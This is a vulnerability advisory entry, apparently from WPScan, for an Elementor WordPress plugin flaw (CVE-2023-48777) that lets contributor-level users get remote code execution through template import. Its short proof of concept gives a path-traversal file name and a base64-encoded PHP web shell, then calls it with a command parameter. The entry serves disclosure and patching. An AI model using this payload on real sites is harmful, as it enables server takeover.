Lucene search
WpvulndbWPVDB-ID:A6B3B14C-F06B-4506-9B88-854F155EBCA9HistoryDec 08, 2023 - 12:00 a.m.
Elementor < 3.18.2 - Contributor+ Arbitrary File Upload to RCE via Template Import
2023-12-0800:00:00
wpscan.com
81
elementor
plugin
contributor
remote code execution
template import
Description The plugin is vulnerable to Remote Code Execution via file upload via the template import functionality, allowing authenticated attackers, with contributor-level access and above, to upload files and execute code on the server.
PoC
1. Edit a post in Elementor. 2. Import a template (folder icon on an Elementor block). 3. Pick any JSON file, and intercept the AJAX request. 4. Replace the file name with “/…/…/…/…/shell.php” 5. Replace the base64 contents (fileData) with “PD9waHAgZWNobyBzeXN0ZW0oJF9HRVRbJ2NtZCddKTsgPz4=” 6. Visit /wp-content/shell.php?cmd=id to see the RCE.
| CPE | Name | Operator | Version |
|---|---|---|---|
| eq | 3.18.2 |
Related
nvd
nvd
CVE-2023-48777
2024-03-26 21:15:52
wpexploit
wpexploit
nuclei
nuclei
WordPress Elementor 3.18.1 - File Upload/Remote Code Execution
2024-02-22 06:20:52
cve
cve
CVE-2023-48777
2024-03-26 21:15:52
zdt
zdt
cvelist
cvelist
wordfence
wordfence
openvas
openvas
WordPress Elementor Website Builder Plugin < 3.18.2 RCE Vulnerability
2023-06-02 00:00:00
9.7 High
AI Score
Confidence
High
0.001 Low
EPSS
Percentile
22.0%
Related for WPVDB-ID:A6B3B14C-F06B-4506-9B88-854F155EBCA9